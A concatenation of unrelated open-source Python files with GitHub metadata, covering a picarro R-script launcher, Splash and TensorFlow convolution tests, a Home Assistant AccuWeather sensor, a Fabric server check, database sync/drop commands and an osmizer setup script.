"ref": "refs/heads/master",
"path": "leather/chart.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "82139"
},
{
"name": "Shell",
"bytes": "111"
}
],
"symlink_target": ""
} |
import subprocess
import optparse
import os
import sys
# TODO: Add Windows functionality.
SCRIPT_NAME = "picarro.R"
class ScriptException(Exception):
def __init__(self, returncode, stdout, stderr, script):
self.returncode = returncode
self.stdout = stdout
self.stderr = stderr
Exception.__init__('Error in script')
def run_bash(script):
proc = subprocess.Popen(['bash','-c',script],
stderr = subprocess.PIPE,
stdin = subprocess.PIPE)
stdout, stderr = proc.communicate()
if proc.returncode:
raise ScriptException(proc.returncode, stdout, stderr, script)
return stdout, stderr
# TODO: Add date ranges.
def run(foldername, filename, num_files):
try:
subprocess.call(["./" + SCRIPT_NAME] + [foldername, filename, num_files])
except OSError as e:
print "OS error({0}): {1}".format(e.errno, e.strerror)
def main():
remove_spaces = "find . -depth -name \'* *\' \
| while IFS= read -r f ; do mv -i \"$f\" \"$(dirname \"$f\")/$(basename \"$f\"|tr \' \' _)\" ; done"
usage = "usage: ./%s foldername experiment-data_filename [options]" % os.path.basename(sys.argv[0])
parser = optparse.OptionParser(usage = usage)
parser.add_option('-s','--spaces',action="store_true",dest="script",
help="remove spaces from all files and folders in [foldername]",default=False)
parser.add_option('-n','--numfiles',type="string",action="store",dest="num_files",
help="number of files in each folder.",default='15')
(options, args) = parser.parse_args()
if len(args) < 2:
parser.error("Incorrect number of arguments.\n Please specify a folder name and measurement file.")
elif len(args) > 3:
parser.error("Incorrect number of arguments.\n Too many arguments.")
else:
if options.script:
run_bash(remove_spaces)
run(args[0], args[1], options.num_files)
if __name__ == "__main__":
main()
| {
"content_hash": "437644f2a350ee57d145ee87e8dd2895",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 102,
"avg_line_length": 30.37704918032787,
"alnum_prop": 0.6702644360496492,
"repo_name": "wdonahoe/picarro",
"id": "ab530e88a0e9a3cace4743ec49f9bca00eec1cb5",
"size": "1872",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "picarro.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1872"
},
{
"name": "R",
"bytes": "8422"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import unittest
import pytest
lupa = pytest.importorskip("lupa")
from . import test_render, test_redirects, test_har
from .utils import NON_EXISTING_RESOLVABLE
class Base:
# a hack to skip test running from a mixin
class EmulationMixin(test_render.BaseRenderTest):
endpoint = 'execute'
def request(self, query, endpoint=None, headers=None, **kwargs):
query = {} or query
query.update({'lua_source': self.script})
return self._get_handler().request(query, endpoint, headers, **kwargs)
def post(self, query, endpoint=None, payload=None, headers=None, **kwargs):
raise NotImplementedError()
# ==== overridden tests =============================
@unittest.skipIf(NON_EXISTING_RESOLVABLE, "non existing hosts are resolvable")
def test_render_error(self):
r = self.request({"url": "http://non-existent-host/"})
self.assertStatusCode(r, 400)
def test_self(self):
# make sure mixin order is correct
assert self.endpoint == 'execute'
class EmulatedRenderHtmlTest(Base.EmulationMixin, test_render.RenderHtmlTest):
script = 'main = require("emulation").render_html'
class EmulatedHttpRedirectTest(Base.EmulationMixin, test_redirects.HttpRedirectTest):
script = 'main = require("emulation").render_html'
class EmulatedJsRedirectTest(Base.EmulationMixin, test_redirects.JsRedirectTest):
script = 'main = require("emulation").render_html'
# Overridden to return 400.
@unittest.skipIf(NON_EXISTING_RESOLVABLE, "non existing hosts are resolvable")
def test_redirect_to_non_existing(self):
r = self.request({
"url": self.mockurl("jsredirect-non-existing"),
"wait": 2.,
})
self.assertStatusCode(r, 400)
class EmulatedMetaRedirectTest(Base.EmulationMixin, test_redirects.MetaRedirectTest):
script = 'main = require("emulation").render_html'
class EmulatedRenderPngTest(Base.EmulationMixin, test_render.RenderPngTest):
script = 'main = require("emulation").render_png'
@pytest.mark.xfail(
run=False,
reason="""
Range validation in lua renderer is not implemented and out of range values of
width/height will consume huge amount of memory either bringing down the test
server because of OOM killer or grinding user system to a halt because of swap.
""")
def test_range_checks(self):
super(EmulatedRenderPngTest, self).test_range_checks()
def test_extra_height_doesnt_leave_garbage_when_using_tiled_render(self):
# XXX: this function belongs to test_render, BUT height < 1000 is fixed
# in defaults and so is tile max size, so in order to force rendering
# that may produce extra pixels at the bottom we go the way that avoids
# parameter validation.
r = self.request({'url': self.mockurl('tall'), 'viewport': '100x100',
'height': 3000})
png = self.assertPng(r, height=3000)
# Ensure that the extra pixels at the bottom are transparent.
alpha_channel = png.crop((0, 100, 100, 3000)).getdata(3)
self.assertEqual(alpha_channel.size, (100, 2900))
self.assertEqual(alpha_channel.getextrema(), (0, 0))
class EmulatedRenderJpegTest(Base.EmulationMixin, test_render.RenderJpegTest):
script = 'main = require("emulation").render_jpeg'
@pytest.mark.xfail(
run=False,
reason="""
Range validation in lua renderer is not implemented and out of range values of
width/height will consume huge amount of memory either bringing down the test
server because of OOM killer or grinding user system to a halt because of swap.
""")
def test_range_checks(self):
super(EmulatedRenderJpegTest, self).test_range_checks()
def test_extra_height_doesnt_leave_garbage_when_using_tiled_render(self):
# XXX: this function belongs to test_render, BUT height < 1000 is fixed
# in defaults and so is tile max size, so in order to force rendering
# that may produce extra pixels at the bottom we go the way that avoids
# parameter validation.
r = self.request({'url': self.mockurl('tall'), 'viewport': '100x100',
'height': 3000})
img = self.assertJpeg(r, height=3000)
# Ensure that the extra pixels at the bottom are transparent.
box = img.crop((0, 100, 100, 3000))
self.assertEqual(box.size, (100, 2900))
# iterate over channels
for i in range(3):
self.assertEqual(box.getdata(i).getextrema(), (255, 255))
class EmulatedRenderHarTest(Base.EmulationMixin, test_har.HarRenderTest):
script = 'main = require("emulation").render_har'
| {
"content_hash": "0f2c5bae585f2bd7e895738378744429",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 86,
"avg_line_length": 40.957264957264954,
"alnum_prop": 0.669449081803005,
"repo_name": "kod3r/splash",
"id": "f857e25f875964a5362b2864a031a433cec755de",
"size": "4816",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "splash/tests/test_execute_emulation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "307"
},
{
"name": "Lua",
"bytes": "20836"
},
{
"name": "Python",
"bytes": "537863"
},
{
"name": "Shell",
"bytes": "3747"
}
],
"symlink_target": ""
} |
"""Tests for convolution related functionality in tensorflow.ops.nn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
def _upsample_filters(filters, rate):
"""Upsamples the filters by a factor of rate along the spatial dimensions.
Args:
filters: [h, w, in_depth, out_depth]. Original filters.
rate: An int, specifying the upsampling rate.
Returns:
filters_up: [h_up, w_up, in_depth, out_depth]. Upsampled filters with
h_up = h + (h - 1) * (rate - 1)
w_up = w + (w - 1) * (rate - 1)
containing (rate - 1) zeros between consecutive filter values along
the filters' spatial dimensions.
"""
if rate == 1:
return filters
# [h, w, in_depth, out_depth] -> [in_depth, out_depth, h, w]
filters_up = np.transpose(filters, [2, 3, 0, 1])
ker = np.zeros([rate, rate], dtype=np.float32)
ker[0, 0] = 1
filters_up = np.kron(filters_up, ker)[:, :, :-(rate - 1), :-(rate - 1)]
# [in_depth, out_depth, h_up, w_up] -> [h_up, w_up, in_depth, out_depth]
filters_up = np.transpose(filters_up, [2, 3, 0, 1])
return filters_up
class AtrousConv2DTest(test.TestCase):
@test_util.run_deprecated_v1
def testAtrousConv2DForward(self):
with self.session():
# Input: [batch, height, width, input_depth]
height = 9
for width in [9, 10]: # Test both odd and even width.
x_shape = [2, height, width, 2]
x = np.arange(np.prod(x_shape), dtype=np.float32).reshape(x_shape)
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
for kernel_height in range(1, 4):
for kernel_width in range(1, 4):
f_shape = [kernel_height, kernel_width, 2, 2]
f = np.arange(np.prod(f_shape), dtype=np.float32).reshape(f_shape)
for rate in range(1, 4):
f_up = _upsample_filters(f, rate)
for padding in ["SAME", "VALID"]:
y1 = nn_ops.atrous_conv2d(x, f, rate, padding=padding)
y2 = nn_ops.conv2d(
x, f_up, strides=[1, 1, 1, 1], padding=padding)
self.assertAllClose(y1, y2, rtol=1e-3, atol=1e-3)
@test_util.run_deprecated_v1
def testAtrousSequence(self):
"""Tests optimization of sequence of atrous convolutions.
Verifies that a sequence of `atrous_conv2d` operations with identical `rate`
parameters, 'SAME' `padding`, and `filters` with odd heights/ widths:
net = atrous_conv2d(net, filters1, rate, padding="SAME")
net = atrous_conv2d(net, filters2, rate, padding="SAME")
...
net = atrous_conv2d(net, filtersK, rate, padding="SAME")
is equivalent to:
pad = ... # padding so that the input dims are multiples of rate
net = space_to_batch(net, paddings=pad, block_size=rate)
net = conv2d(net, filters1, strides=[1, 1, 1, 1], padding="SAME")
net = conv2d(net, filters2, strides=[1, 1, 1, 1], padding="SAME")
...
net = conv2d(net, filtersK, strides=[1, 1, 1, 1], padding="SAME")
net = batch_to_space(net, crops=pad, block_size=rate)
"""
padding = "SAME" # The padding needs to be "SAME"
np.random.seed(1) # Make it reproducible.
with self.session():
# Input: [batch, height, width, input_depth]
for height in range(15, 17):
for width in range(15, 17):
x_shape = [3, height, width, 2]
x = np.random.random_sample(x_shape).astype(np.float32)
for kernel in [1, 3, 5]: # The kernel size needs to be odd.
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
f_shape = [kernel, kernel, 2, 2]
f = 1e-2 * np.random.random_sample(f_shape).astype(np.float32)
for rate in range(2, 4):
# y1: three atrous_conv2d in a row.
y1 = nn_ops.atrous_conv2d(x, f, rate, padding=padding)
y1 = nn_ops.atrous_conv2d(y1, f, rate, padding=padding)
y1 = nn_ops.atrous_conv2d(y1, f, rate, padding=padding)
# y2: space_to_batch, three conv2d in a row, batch_to_space
pad_bottom = 0 if height % rate == 0 else rate - height % rate
pad_right = 0 if width % rate == 0 else rate - width % rate
pad = [[0, pad_bottom], [0, pad_right]]
y2 = array_ops.space_to_batch(x, paddings=pad, block_size=rate)
y2 = nn_ops.conv2d(y2, f, strides=[1, 1, 1, 1], padding=padding)
y2 = nn_ops.conv2d(y2, f, strides=[1, 1, 1, 1], padding=padding)
y2 = nn_ops.conv2d(y2, f, strides=[1, 1, 1, 1], padding=padding)
y2 = array_ops.batch_to_space(y2, crops=pad, block_size=rate)
self.assertAllClose(y1, y2, rtol=1e-2, atol=1e-2)
@test_util.run_deprecated_v1
def testGradient(self):
with self.session():
# Input: [batch, height, width, input_depth]
x_shape = [2, 5, 6, 2]
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
f_shape = [3, 3, 2, 2]
# Output: [batch, height, width, output_depth]
y_shape = [2, 5, 6, 2]
np.random.seed(1) # Make it reproducible.
x_val = np.random.random_sample(x_shape).astype(np.float32)
f_val = np.random.random_sample(f_shape).astype(np.float32)
x = constant_op.constant(x_val, name="x", dtype=dtypes.float32)
f = constant_op.constant(f_val, name="f", dtype=dtypes.float32)
for rate in range(1, 4):
output = nn_ops.atrous_conv2d(x, f, rate=rate, padding="SAME")
err = gradient_checker.compute_gradient_error([x, f],
[x_shape, f_shape],
output, y_shape)
print("atrous_conv2d gradient err = %g " % err)
err_tolerance = 4e-3 if test_util.is_xla_enabled() else 1e-3
self.assertLess(err, err_tolerance)
class AtrousConv2DTransposeTest(test.TestCase):
@test_util.run_deprecated_v1
def testAtrousConv2DTransposeForward(self):
with self.session():
# Input: [batch, height, width, input_depth]
height = 9
for width in [9, 10]: # Test both odd and even width.
x_shape = [2, height, width, 2]
x = np.arange(np.prod(x_shape), dtype=np.float32).reshape(x_shape)
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
for kernel_height in range(1, 4):
for kernel_width in range(1, 4):
f_shape = [kernel_height, kernel_width, 2, 2]
f = np.arange(np.prod(f_shape), dtype=np.float32).reshape(f_shape)
for rate in range(1, 4):
f_up = _upsample_filters(f, rate)
kernel_height_up = (kernel_height + (kernel_height - 1) *
(rate - 1))
kernel_width_up = kernel_width + (kernel_width - 1) * (rate - 1)
for padding in ["SAME", "VALID"]:
if padding == "SAME":
y_shape = [2, height, width, 2]
else:
y_shape = [
2, height + kernel_height_up - 1,
width + kernel_width_up - 1, 2
]
y1 = nn_ops.atrous_conv2d_transpose(x, f, y_shape, rate,
padding)
y2 = nn_ops.conv2d_transpose(
x, f_up, y_shape, strides=[1, 1, 1, 1], padding=padding)
self.assertAllClose(y1, y2, rtol=1e-3, atol=1e-3)
class AtrousDepthwiseConv2DTest(test.TestCase):
@test_util.run_deprecated_v1
def testAtrousDepthwiseConv2DForward(self):
strides = [1, 1, 1, 1]
with self.session():
# Input: [batch, height, width, input_depth]
height = 9
for width in [9, 10]: # Test both odd and even width.
x_shape = [2, height, width, 2]
x = np.arange(np.prod(x_shape), dtype=np.float32).reshape(x_shape)
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
for kernel_height in range(1, 4):
for kernel_width in range(1, 4):
f_shape = [kernel_height, kernel_width, 2, 2]
f = np.arange(np.prod(f_shape), dtype=np.float32).reshape(f_shape)
for rate in range(1, 4):
f_up = _upsample_filters(f, rate)
for padding in ["SAME", "VALID"]:
y1 = nn_impl.depthwise_conv2d(
x, f, strides, padding, rate=[rate, rate])
y2 = nn_impl.depthwise_conv2d(x, f_up, strides, padding)
self.assertAllClose(y1, y2, rtol=1e-3, atol=1e-3)
if __name__ == "__main__":
test.main()
| {
"content_hash": "6eeabe6a30a6e91f32374680f2f0ce60",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 80,
"avg_line_length": 41.94063926940639,
"alnum_prop": 0.5790963527490474,
"repo_name": "annarev/tensorflow",
"id": "1aa0b0315f83dfb4cd6fe1449993060a362a9498",
"size": "9874",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/kernel_tests/atrous_conv2d_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "1286"
},
{
"name": "Batchfile",
"bytes": "9258"
},
{
"name": "C",
"bytes": "341894"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "49343974"
},
{
"name": "CMake",
"bytes": "195286"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1253646"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "863222"
},
{
"name": "Jupyter Notebook",
"bytes": "2604741"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "52734"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "41289329"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "469612"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
import conf
import g
import os
import sys
from item import item_base
from item.jobsq import work_item
from item.util.item_type import Item_Type
__all__ = ['One', 'Many',]
log = g.log.getLogger('work_item_dl')
class One(work_item.One):
# Base class overrides
local_defns = [
]
attr_defns = work_item.One.attr_defns + local_defns
psql_defns = work_item.One.psql_defns + local_defns
gwis_defns = item_base.One.attr_defns_reduce_for_gwis(attr_defns)
__slots__ = [] + [attr_defn[0] for attr_defn in local_defns]
#
def __init__(self, qb=None, row=None, req=None, copy_from=None):
g.assurt(copy_from is None) # Not supported for this class.
work_item.One.__init__(self, qb, row, req, copy_from)
# *** Saving to the Database
#
def save_core(self, qb):
g.assurt(False) # Not supported
# ***
#
def get_zipname(self):
g.assurt(False)
class Many(work_item.Many):
one_class = One
# This is deliberately the same type as the base class.
# job_class = 'merge_job'
__slots__ = ()
# *** Constructor
def __init__(self):
work_item.Many.__init__(self)
# ***
#
def search_for_items(self, *args, **kwargs):
qb = self.query_builderer(*args, **kwargs)
work_item.Many.search_for_items(self, qb)
self.search_enforce_download_rules(qb)
#
def get_download_filename(self):
zpath = None
if len(self) != 1:
# This shouldn't happen unless the client has been hacked, right?
log.error('get_download_filename: too many or too few many: %d'
% (len(self),))
else:
wtem = self[0]
fbase = '%s.fin' % (wtem.local_file_guid,)
fpath = os.path.join(conf.shapefile_directory, fbase)
zbase = '%s.zip' % (wtem.get_zipname(),)
zpath = os.path.join(fpath, zbase)
# FIXME: I want to rename the zip so it's not a weird name that the
# user downloads.
log.debug('get_download_filename: %s' % (zpath,))
return zpath
| {
"content_hash": "9ad9ae1c3974a48200cbad079dbdcf53",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 76,
"avg_line_length": 24.698795180722893,
"alnum_prop": 0.5980487804878049,
"repo_name": "lbouma/Cyclopath",
"id": "b68cdae316352a8952e0e2e87fbde6e389f127f0",
"size": "2162",
"binary": false,
"copies": "1",
"ref": "refs/heads/release",
"path": "pyserver/item/jobsq/work_item_download.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "3369673"
},
{
"name": "ApacheConf",
"bytes": "46372"
},
{
"name": "C",
"bytes": "281248"
},
{
"name": "CSS",
"bytes": "36786"
},
{
"name": "Gnuplot",
"bytes": "14865"
},
{
"name": "HTML",
"bytes": "203213"
},
{
"name": "Java",
"bytes": "688800"
},
{
"name": "JavaScript",
"bytes": "60678"
},
{
"name": "M4",
"bytes": "35700"
},
{
"name": "Makefile",
"bytes": "8036"
},
{
"name": "PHP",
"bytes": "18399"
},
{
"name": "PLSQL",
"bytes": "451"
},
{
"name": "PLpgSQL",
"bytes": "1407944"
},
{
"name": "Perl",
"bytes": "669009"
},
{
"name": "Python",
"bytes": "5830046"
},
{
"name": "Shell",
"bytes": "639435"
}
],
"symlink_target": ""
} |
import re
from fabric.api import env, run, hide, task
from envassert import detect, file, group, package, port, process, service, \
user, text
def apache2_is_responding():
with hide('running', 'stdout'):
wget_cmd = (
"wget --quiet --output-document - --header='Host: example.com' "
"http://localhost/"
)
homepage = run(wget_cmd)
if re.search('Welcome to example.com', homepage):
return True
else:
return False
@task
def check():
env.platform_family = detect.detect()
config_js = '/var/app/current/config.js'
assert file.exists(config_js), \
"%s does not exist" % config_js
assert file_contains(config_js, 'StrictHostKeyChecking false'), \
"%s does not turn off StrictHostKeyChecking" % config_js
dot_npm = "/home/my_nodejs_app/.npm"
assert file.exists(dot_npm), \
"%s does not exist" % dot_npm
assert file.is_dir(dot_npm), \
"%s is not a directory" % dot_npm
assert file.is_mode(dot_npm, 'r-xr-xr-x'), \
"%s is not mode 755" % dot_npm
assert file.owner_is(dot_npm, 'my_nodejs_app'), \
"%s is not owned by my_nodejs_app" % dot_npm
# directory { should be_grouped_into 'my_nodejs_app' }
assert port.is_listening(80), "port 80/apache2 is not listening"
assert user.exists("my_nodejs_app"), "user my_nodejs_app does not exist"
assert user_has_shell('my_nodejs_app', ':/bin/bash'), \
"user should have bash shell"
assert process.is_up("node"), "node process is not up"
# its('args') { should match 'server.js|app.js' }
assert service.is_enabled("my_nodejs_app"), \
"my_nodejs_app service is not enabled"
assert apache2_is_responding(), "node demo app did not respond as expected"
def user_has_shell(uname, sname):
fname = '/etc/passwd'
user_line = file_find(fname, uname)
if not user_line:
return False
return sname in user_line
def file_contains(fname, txt):
with open(fname) as dataf:
return any(txt in line for line in dataf)
return False
def file_find(fname, txt):
with open(fname) as dataf:
for line in dataf:
if txt in line:
return txt
| {
"content_hash": "e067df8901477658244b49cbe70128ce",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 79,
"avg_line_length": 30.173333333333332,
"alnum_prop": 0.6129032258064516,
"repo_name": "prometheanfire/nodejs-multi",
"id": "dc9fab6ca935942a808877003cb0339df5cc7c54",
"size": "2263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/fabric/nodejsmulti.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2763"
},
{
"name": "Ruby",
"bytes": "400946"
}
],
"symlink_target": ""
} |
"""Support for the AccuWeather service."""
from __future__ import annotations
from typing import Any, cast
from homeassistant.components.sensor import SensorEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_DEVICE_CLASS,
ATTR_ICON,
CONF_NAME,
DEVICE_CLASS_TEMPERATURE,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from . import AccuWeatherDataUpdateCoordinator
from .const import (
API_IMPERIAL,
API_METRIC,
ATTR_ENABLED,
ATTR_FORECAST,
ATTR_LABEL,
ATTR_UNIT_IMPERIAL,
ATTR_UNIT_METRIC,
ATTRIBUTION,
COORDINATOR,
DOMAIN,
FORECAST_SENSOR_TYPES,
MANUFACTURER,
MAX_FORECAST_DAYS,
NAME,
SENSOR_TYPES,
)
PARALLEL_UPDATES = 1
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Add AccuWeather entities from a config_entry."""
name: str = entry.data[CONF_NAME]
coordinator: AccuWeatherDataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id][
COORDINATOR
]
sensors: list[AccuWeatherSensor] = []
for sensor in SENSOR_TYPES:
sensors.append(AccuWeatherSensor(name, sensor, coordinator))
if coordinator.forecast:
for sensor in FORECAST_SENSOR_TYPES:
for day in range(MAX_FORECAST_DAYS + 1):
# Some air quality/allergy sensors are only available for certain
# locations.
if sensor in coordinator.data[ATTR_FORECAST][0]:
sensors.append(
AccuWeatherSensor(name, sensor, coordinator, forecast_day=day)
)
async_add_entities(sensors)
class AccuWeatherSensor(CoordinatorEntity, SensorEntity):
"""Define an AccuWeather entity."""
coordinator: AccuWeatherDataUpdateCoordinator
def __init__(
self,
name: str,
kind: str,
coordinator: AccuWeatherDataUpdateCoordinator,
forecast_day: int | None = None,
) -> None:
"""Initialize."""
super().__init__(coordinator)
if forecast_day is None:
self._description = SENSOR_TYPES[kind]
self._sensor_data: dict[str, Any]
if kind == "Precipitation":
self._sensor_data = coordinator.data["PrecipitationSummary"][kind]
else:
self._sensor_data = coordinator.data[kind]
else:
self._description = FORECAST_SENSOR_TYPES[kind]
self._sensor_data = coordinator.data[ATTR_FORECAST][forecast_day][kind]
self._unit_system = API_METRIC if coordinator.is_metric else API_IMPERIAL
self._name = name
self.kind = kind
self._device_class = None
self._attrs = {ATTR_ATTRIBUTION: ATTRIBUTION}
self.forecast_day = forecast_day
@property
def name(self) -> str:
"""Return the name."""
if self.forecast_day is not None:
return f"{self._name} {self._description[ATTR_LABEL]} {self.forecast_day}d"
return f"{self._name} {self._description[ATTR_LABEL]}"
@property
def unique_id(self) -> str:
"""Return a unique_id for this entity."""
if self.forecast_day is not None:
return f"{self.coordinator.location_key}-{self.kind}-{self.forecast_day}".lower()
return f"{self.coordinator.location_key}-{self.kind}".lower()
@property
def device_info(self) -> DeviceInfo:
"""Return the device info."""
return {
"identifiers": {(DOMAIN, self.coordinator.location_key)},
"name": NAME,
"manufacturer": MANUFACTURER,
"entry_type": "service",
}
@property
def state(self) -> StateType:
"""Return the state."""
if self.forecast_day is not None:
if self._description["device_class"] == DEVICE_CLASS_TEMPERATURE:
return cast(float, self._sensor_data["Value"])
if self.kind == "UVIndex":
return cast(int, self._sensor_data["Value"])
if self.kind in ["Grass", "Mold", "Ragweed", "Tree", "Ozone"]:
return cast(int, self._sensor_data["Value"])
if self.kind == "Ceiling":
return round(self._sensor_data[self._unit_system]["Value"])
if self.kind == "PressureTendency":
return cast(str, self._sensor_data["LocalizedText"].lower())
if self._description["device_class"] == DEVICE_CLASS_TEMPERATURE:
return cast(float, self._sensor_data[self._unit_system]["Value"])
if self.kind == "Precipitation":
return cast(float, self._sensor_data[self._unit_system]["Value"])
if self.kind in ["Wind", "WindGust"]:
return cast(float, self._sensor_data["Speed"][self._unit_system]["Value"])
if self.kind in ["WindDay", "WindNight", "WindGustDay", "WindGustNight"]:
return cast(StateType, self._sensor_data["Speed"]["Value"])
return cast(StateType, self._sensor_data)
@property
def icon(self) -> str | None:
"""Return the icon."""
return self._description[ATTR_ICON]
@property
def device_class(self) -> str | None:
"""Return the device_class."""
return self._description[ATTR_DEVICE_CLASS]
@property
def unit_of_measurement(self) -> str | None:
"""Return the unit the value is expressed in."""
if self.coordinator.is_metric:
return self._description[ATTR_UNIT_METRIC]
return self._description[ATTR_UNIT_IMPERIAL]
@property
def extra_state_attributes(self) -> dict[str, Any]:
"""Return the state attributes."""
if self.forecast_day is not None:
if self.kind in ["WindDay", "WindNight", "WindGustDay", "WindGustNight"]:
self._attrs["direction"] = self._sensor_data["Direction"]["English"]
elif self.kind in ["Grass", "Mold", "Ragweed", "Tree", "UVIndex", "Ozone"]:
self._attrs["level"] = self._sensor_data["Category"]
return self._attrs
if self.kind == "UVIndex":
self._attrs["level"] = self.coordinator.data["UVIndexText"]
elif self.kind == "Precipitation":
self._attrs["type"] = self.coordinator.data["PrecipitationType"]
return self._attrs
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return self._description[ATTR_ENABLED]
| {
"content_hash": "74a882251658ca253de8b32d87abd889",
"timestamp": "",
"source": "github",
"line_count": 184,
"max_line_length": 93,
"avg_line_length": 37.141304347826086,
"alnum_prop": 0.622329528826456,
"repo_name": "kennedyshead/home-assistant",
"id": "09e9cda30adbb1e5ac1f7636819ab0db5c76036a",
"size": "6834",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/accuweather/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "33970989"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
} |
from webtools.management.base import Command
from webtools.database import Base
class SyncdbCommand(Command):
"""
Syncronize all available sqlalchemy defined tables
to a database server.
"""
def take_action(self, options):
if not self.cmdapp.conf:
raise RuntimeError("For start serverm --settings parameter"
" is mandatory!")
from webtools.application import Application
app = Application(self.cmdapp.conf)
print("Create theese tables:")
for tbl in Base.metadata.sorted_tables:
print(" * {0}".format(tbl.name))
res = input("Create [Y/n] ")
if not res or res.lower() == "y":
res = True
else:
res = False
if res:
Base.metadata.create_all(app.engine)
class DropdbCommand(Command):
"""
Remove all tables.
"""
def take_action(self, options):
if not self.cmdapp.conf:
raise RuntimeError("For start serverm --settings parameter"
" is mandatory!")
from webtools.application import Application
app = Application(self.cmdapp.conf)
print("Drop theese tables:")
for tbl in Base.metadata.sorted_tables:
print(" * {0}".format(tbl.name))
res = input("Drop [Y/n] ")
if not res or res.lower() == "y":
res = True
else:
res = False
if res:
Base.metadata.drop_all(app.engine)
| {
"content_hash": "20ce3998cea01c22f2cb849c8f307b11",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 71,
"avg_line_length": 26.46551724137931,
"alnum_prop": 0.5589576547231271,
"repo_name": "niwinz/tornado-webtools",
"id": "48a545939d8cb31b4050a5b2ecd7cca1bcc675b6",
"size": "1535",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webtools/management/commands/syncdb.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "72924"
},
{
"name": "Shell",
"bytes": "26"
}
],
"symlink_target": ""
} |
'''osmizer: convert simple GeoJSON-schema feature layers to the OSM XML format.
Documentation available at https://github.com/OpenSidewalks/osmizer.
'''
import re
import sys
from setuptools import setup, find_packages
# Check python versions
if sys.version_info.major < 3:
print('osmizer is currently compatible only with Python 3.')
sys.exit(1)
# Get version from package __init__.py
with open('osmizer/__init__.py', 'r') as f:
__version__ = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(), re.MULTILINE).group(1)
if not __version__:
raise RuntimeError('Cannot find version information')
doclines = __doc__.split('\n')
config = {
'name': 'osmizer',
'version': __version__,
'description': doclines[0],
'long_description': '\n'.join(doclines[2:]),
'author': '',
'author_email': '',
'maintainer': '',
'maintainer_email': '',
'url': 'https://github.com/OpenSidewalks/osmizer',
'license': 'BSD',
'download_url': 'https://github.com/OpenSidewalks/osmizer.git',
'install_requires': ['click',
'jsonschema',
'lxml',
'rtree'],
'packages': find_packages(),
'include_package_data': True,
'classifiers': ['Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3 :: Only'],
'zip_safe': False,
'entry_points': '''
[console_scripts]
osmizer=osmizer.__main__:cli
'''
}
setup(test_suite='nose.collector',
**config)
| {
"content_hash": "8965fac47d16e22efa3c607d0b213bd6",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 79,
"avg_line_length": 30.70909090909091,
"alnum_prop": 0.5648312611012434,
"repo_name": "OpenSidewalks/osmizer",
"id": "c0c4af1113f7941a35bf919d46f1f79a3350c1a2",
"size": "1689",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24610"
}
],
"symlink_target": ""
} |
"""Unit tests for the Container driver module."""
import ddt
import functools
import mock
